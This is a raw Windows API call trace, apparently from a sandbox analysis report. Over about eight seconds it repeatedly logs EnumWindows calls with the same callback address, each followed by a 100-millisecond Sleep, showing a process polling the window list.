EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0171.989] Sleep (dwMilliseconds=0x64) [0172.021] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.021] Sleep (dwMilliseconds=0x64) [0172.080] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.081] Sleep (dwMilliseconds=0x64) [0172.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.133] Sleep (dwMilliseconds=0x64) [0172.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.153] Sleep (dwMilliseconds=0x64) [0172.203] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.205] Sleep (dwMilliseconds=0x64) [0172.225] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.225] Sleep (dwMilliseconds=0x64) [0172.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.270] Sleep (dwMilliseconds=0x64) [0172.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.317] Sleep (dwMilliseconds=0x64) [0172.352] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.352] Sleep (dwMilliseconds=0x64) [0172.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.395] Sleep (dwMilliseconds=0x64) [0172.434] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.435] Sleep (dwMilliseconds=0x64) [0172.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.442] Sleep (dwMilliseconds=0x64) [0172.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.489] Sleep (dwMilliseconds=0x64) [0172.506] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.507] Sleep (dwMilliseconds=0x64) [0172.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.522] Sleep (dwMilliseconds=0x64) [0172.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.552] Sleep (dwMilliseconds=0x64) [0172.589] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.590] Sleep (dwMilliseconds=0x64) [0172.601] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.601] Sleep (dwMilliseconds=0x64) [0172.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.653] Sleep (dwMilliseconds=0x64) [0172.684] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.684] Sleep (dwMilliseconds=0x64) [0172.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.692] Sleep (dwMilliseconds=0x64) [0172.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.708] Sleep (dwMilliseconds=0x64) [0172.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.755] Sleep (dwMilliseconds=0x64) [0172.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.802] Sleep (dwMilliseconds=0x64) [0172.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.848] Sleep (dwMilliseconds=0x64) [0172.897] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.898] Sleep (dwMilliseconds=0x64) [0172.939] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.939] Sleep (dwMilliseconds=0x64) [0172.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.942] Sleep (dwMilliseconds=0x64) [0172.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0172.991] Sleep (dwMilliseconds=0x64) [0173.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.026] Sleep (dwMilliseconds=0x64) [0173.130] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.130] Sleep (dwMilliseconds=0x64) [0173.224] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.225] Sleep (dwMilliseconds=0x64) [0173.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.251] Sleep (dwMilliseconds=0x64) [0173.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.257] Sleep (dwMilliseconds=0x64) [0173.269] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.270] Sleep (dwMilliseconds=0x64) [0173.331] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.331] Sleep (dwMilliseconds=0x64) [0173.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.348] Sleep (dwMilliseconds=0x64) [0173.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.395] Sleep (dwMilliseconds=0x64) [0173.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.411] Sleep (dwMilliseconds=0x64) [0173.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.426] Sleep (dwMilliseconds=0x64) [0173.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.473] Sleep (dwMilliseconds=0x64) [0173.520] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.521] Sleep (dwMilliseconds=0x64) [0173.547] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.548] Sleep (dwMilliseconds=0x64) [0173.553] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.554] Sleep (dwMilliseconds=0x64) [0173.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.567] Sleep (dwMilliseconds=0x64) [0173.615] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.616] Sleep (dwMilliseconds=0x64) [0173.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.676] Sleep (dwMilliseconds=0x64) [0173.724] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.724] Sleep (dwMilliseconds=0x64) [0173.757] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.757] Sleep (dwMilliseconds=0x64) [0173.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.770] Sleep (dwMilliseconds=0x64) [0173.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.833] Sleep (dwMilliseconds=0x64) [0173.881] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.881] Sleep (dwMilliseconds=0x64) [0173.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.943] Sleep (dwMilliseconds=0x64) [0173.961] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.962] Sleep (dwMilliseconds=0x64) [0173.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.973] Sleep (dwMilliseconds=0x64) [0173.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0173.990] Sleep (dwMilliseconds=0x64) [0174.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.036] Sleep (dwMilliseconds=0x64) [0174.113] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.114] Sleep (dwMilliseconds=0x64) [0174.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.195] Sleep (dwMilliseconds=0x64) [0174.239] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.240] Sleep (dwMilliseconds=0x64) [0174.299] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.299] Sleep (dwMilliseconds=0x64) [0174.350] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.351] Sleep (dwMilliseconds=0x64) [0174.380] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.380] Sleep (dwMilliseconds=0x64) [0174.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.395] Sleep (dwMilliseconds=0x64) [0174.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.411] Sleep (dwMilliseconds=0x64) [0174.461] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.463] Sleep (dwMilliseconds=0x64) [0174.483] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.483] Sleep (dwMilliseconds=0x64) [0174.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.489] Sleep (dwMilliseconds=0x64) [0174.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.505] Sleep (dwMilliseconds=0x64) [0174.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.568] Sleep (dwMilliseconds=0x64) [0174.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.614] Sleep (dwMilliseconds=0x64) [0174.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.641] Sleep (dwMilliseconds=0x64) [0174.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.646] Sleep (dwMilliseconds=0x64) [0174.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.661] Sleep (dwMilliseconds=0x64) [0174.706] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.707] Sleep (dwMilliseconds=0x64) [0174.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.723] Sleep (dwMilliseconds=0x64) [0174.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.770] Sleep (dwMilliseconds=0x64) [0174.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.833] Sleep (dwMilliseconds=0x64) [0174.862] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.862] Sleep (dwMilliseconds=0x64) [0174.879] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.879] Sleep (dwMilliseconds=0x64) [0174.919] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.919] Sleep (dwMilliseconds=0x64) [0174.928] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.928] Sleep (dwMilliseconds=0x64) [0174.978] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.978] Sleep (dwMilliseconds=0x64) [0174.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0174.993] Sleep (dwMilliseconds=0x64) [0175.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.004] Sleep (dwMilliseconds=0x64) [0175.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.036] Sleep (dwMilliseconds=0x64) [0175.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.094] Sleep (dwMilliseconds=0x64) [0175.099] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.099] Sleep (dwMilliseconds=0x64) [0175.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.122] Sleep (dwMilliseconds=0x64) [0175.205] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.206] Sleep (dwMilliseconds=0x64) [0175.254] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.255] Sleep (dwMilliseconds=0x64) [0175.282] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.283] Sleep (dwMilliseconds=0x64) [0175.286] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.287] Sleep (dwMilliseconds=0x64) [0175.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.302] Sleep (dwMilliseconds=0x64) [0175.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.349] Sleep (dwMilliseconds=0x64) [0175.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.395] Sleep (dwMilliseconds=0x64) [0175.421] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.421] Sleep (dwMilliseconds=0x64) [0175.426] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.426] Sleep (dwMilliseconds=0x64) [0175.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.442] Sleep (dwMilliseconds=0x64) [0175.486] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.487] Sleep (dwMilliseconds=0x64) [0175.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.536] Sleep (dwMilliseconds=0x64) [0175.556] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.556] Sleep (dwMilliseconds=0x64) [0175.566] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.567] Sleep (dwMilliseconds=0x64) [0175.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.584] Sleep (dwMilliseconds=0x64) [0175.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.630] Sleep (dwMilliseconds=0x64) [0175.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.676] Sleep (dwMilliseconds=0x64) [0175.709] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.709] Sleep (dwMilliseconds=0x64) [0175.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.723] Sleep (dwMilliseconds=0x64) [0175.738] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.739] Sleep (dwMilliseconds=0x64) [0175.798] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.799] Sleep (dwMilliseconds=0x64) [0175.805] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.806] Sleep (dwMilliseconds=0x64) [0175.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.818] Sleep (dwMilliseconds=0x64) [0175.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.849] Sleep (dwMilliseconds=0x64) [0175.898] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.899] Sleep (dwMilliseconds=0x64) [0175.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.958] Sleep (dwMilliseconds=0x64) [0175.993] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0175.994] Sleep (dwMilliseconds=0x64) [0176.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.005] Sleep (dwMilliseconds=0x64) [0176.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.052] Sleep (dwMilliseconds=0x64) [0176.090] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.091] Sleep (dwMilliseconds=0x64) [0176.097] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.098] Sleep (dwMilliseconds=0x64) [0176.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.115] Sleep (dwMilliseconds=0x64) [0176.241] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.242] Sleep (dwMilliseconds=0x64) [0176.256] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.257] Sleep (dwMilliseconds=0x64) [0176.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.270] Sleep (dwMilliseconds=0x64) [0176.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.302] Sleep (dwMilliseconds=0x64) [0176.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.340] Sleep (dwMilliseconds=0x64) [0176.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.348] Sleep (dwMilliseconds=0x64) [0176.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.395] Sleep (dwMilliseconds=0x64) [0176.413] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.413] Sleep (dwMilliseconds=0x64) [0176.427] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.428] Sleep (dwMilliseconds=0x64) [0176.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.458] Sleep (dwMilliseconds=0x64) [0176.493] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.494] Sleep (dwMilliseconds=0x64) [0176.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.505] Sleep (dwMilliseconds=0x64) [0176.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.552] Sleep (dwMilliseconds=0x64) [0176.570] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.570] Sleep (dwMilliseconds=0x64) [0176.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.584] Sleep (dwMilliseconds=0x64) [0176.613] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.614] Sleep (dwMilliseconds=0x64) [0176.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.653] Sleep (dwMilliseconds=0x64) [0176.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.661] Sleep (dwMilliseconds=0x64) [0176.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.708] Sleep (dwMilliseconds=0x64) [0176.735] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.736] Sleep (dwMilliseconds=0x64) [0176.738] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.739] Sleep (dwMilliseconds=0x64) [0176.755] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.756] Sleep (dwMilliseconds=0x64) [0176.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.802] Sleep (dwMilliseconds=0x64) [0176.823] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.824] Sleep (dwMilliseconds=0x64) [0176.832] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.833] Sleep (dwMilliseconds=0x64) [0176.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.848] Sleep (dwMilliseconds=0x64) [0176.895] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.895] Sleep (dwMilliseconds=0x64) [0176.914] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.914] Sleep (dwMilliseconds=0x64) [0176.927] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.928] Sleep (dwMilliseconds=0x64) [0176.966] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0176.967] Sleep (dwMilliseconds=0x64) [0177.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.005] Sleep (dwMilliseconds=0x64) [0177.025] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.026] Sleep (dwMilliseconds=0x64) [0177.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.036] Sleep (dwMilliseconds=0x64) [0177.051] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.051] Sleep (dwMilliseconds=0x64) [0177.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.098] Sleep (dwMilliseconds=0x64) [0177.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.145] Sleep (dwMilliseconds=0x64) [0177.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.224] Sleep (dwMilliseconds=0x64) [0177.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.270] Sleep (dwMilliseconds=0x64) [0177.305] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.305] Sleep (dwMilliseconds=0x64) [0177.316] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.317] Sleep (dwMilliseconds=0x64) [0177.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.364] Sleep (dwMilliseconds=0x64) [0177.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.379] Sleep (dwMilliseconds=0x64) [0177.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.395] Sleep (dwMilliseconds=0x64) [0177.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.442] Sleep (dwMilliseconds=0x64) [0177.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.489] Sleep (dwMilliseconds=0x64) [0177.514] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.515] Sleep (dwMilliseconds=0x64) [0177.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.520] Sleep (dwMilliseconds=0x64) [0177.537] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.537] Sleep (dwMilliseconds=0x64) [0177.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.573] Sleep (dwMilliseconds=0x64) [0177.582] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.582] Sleep (dwMilliseconds=0x64) [0177.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.630] Sleep (dwMilliseconds=0x64) [0177.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.676] Sleep (dwMilliseconds=0x64) [0177.695] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.695] Sleep (dwMilliseconds=0x64) [0177.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.707] Sleep (dwMilliseconds=0x64) [0177.727] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.728] Sleep (dwMilliseconds=0x64) [0177.796] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.797] Sleep (dwMilliseconds=0x64) [0177.819] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.820] Sleep (dwMilliseconds=0x64) [0177.866] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.866] Sleep (dwMilliseconds=0x64) [0177.888] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.888] Sleep (dwMilliseconds=0x64) [0177.905] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.906] Sleep (dwMilliseconds=0x64) [0177.925] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.926] Sleep (dwMilliseconds=0x64) [0177.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.973] Sleep (dwMilliseconds=0x64) [0177.986] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0177.986] Sleep (dwMilliseconds=0x64) [0178.014] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.015] Sleep (dwMilliseconds=0x64) [0178.045] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.046] Sleep (dwMilliseconds=0x64) [0178.058] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.058] Sleep (dwMilliseconds=0x64) [0178.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.094] Sleep (dwMilliseconds=0x64) [0178.120] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.121] Sleep (dwMilliseconds=0x64) [0178.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.140] Sleep (dwMilliseconds=0x64) [0178.198] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.199] Sleep (dwMilliseconds=0x64) [0178.213] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.213] Sleep (dwMilliseconds=0x64) [0178.246] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.247] Sleep (dwMilliseconds=0x64) [0178.278] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.278] Sleep (dwMilliseconds=0x64) [0178.290] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.291] Sleep (dwMilliseconds=0x64) [0178.327] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.328] Sleep (dwMilliseconds=0x64) [0178.346] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.346] Sleep (dwMilliseconds=0x64) [0178.368] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.369] Sleep (dwMilliseconds=0x64) [0178.408] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.409] Sleep (dwMilliseconds=0x64) [0178.418] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.419] Sleep (dwMilliseconds=0x64) [0178.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.457] Sleep (dwMilliseconds=0x64) [0178.490] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.491] Sleep (dwMilliseconds=0x64) [0178.503] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.504] Sleep (dwMilliseconds=0x64) [0178.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.541] Sleep (dwMilliseconds=0x64) [0178.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.561] Sleep (dwMilliseconds=0x64) [0178.623] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.624] Sleep (dwMilliseconds=0x64) [0178.667] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.667] Sleep (dwMilliseconds=0x64) [0178.672] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.672] Sleep (dwMilliseconds=0x64) [0178.718] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.719] Sleep (dwMilliseconds=0x64) [0178.750] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.751] Sleep (dwMilliseconds=0x64) [0178.757] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.758] Sleep (dwMilliseconds=0x64) [0178.806] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.807] Sleep (dwMilliseconds=0x64) [0178.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.849] Sleep (dwMilliseconds=0x64) [0178.863] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.864] Sleep (dwMilliseconds=0x64) [0178.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.900] Sleep (dwMilliseconds=0x64) [0178.923] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.924] Sleep (dwMilliseconds=0x64) [0178.947] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.948] Sleep (dwMilliseconds=0x64) [0178.985] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.986] Sleep (dwMilliseconds=0x64) [0178.996] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0178.996] Sleep (dwMilliseconds=0x64) [0179.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.031] Sleep (dwMilliseconds=0x64) [0179.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.067] Sleep (dwMilliseconds=0x64) [0179.080] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.081] Sleep (dwMilliseconds=0x64) [0179.128] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.129] Sleep (dwMilliseconds=0x64) [0179.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.190] Sleep (dwMilliseconds=0x64) [0179.202] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.202] Sleep (dwMilliseconds=0x64) [0179.237] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.238] Sleep (dwMilliseconds=0x64) [0179.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.271] Sleep (dwMilliseconds=0x64) [0179.293] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.294] Sleep (dwMilliseconds=0x64) [0179.329] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.329] Sleep (dwMilliseconds=0x64) [0179.339] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.339] Sleep (dwMilliseconds=0x64) [0179.382] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.383] Sleep (dwMilliseconds=0x64) [0179.410] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.410] Sleep (dwMilliseconds=0x64) [0179.430] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.431] Sleep (dwMilliseconds=0x64) [0179.499] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.500] Sleep (dwMilliseconds=0x64) [0179.516] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.516] Sleep (dwMilliseconds=0x64) [0179.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.542] Sleep (dwMilliseconds=0x64) [0179.575] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.575] Sleep (dwMilliseconds=0x64) [0179.581] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.581] Sleep (dwMilliseconds=0x64) [0179.618] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.619] Sleep (dwMilliseconds=0x64) [0179.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.644] Sleep (dwMilliseconds=0x64) [0179.656] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.656] Sleep (dwMilliseconds=0x64) 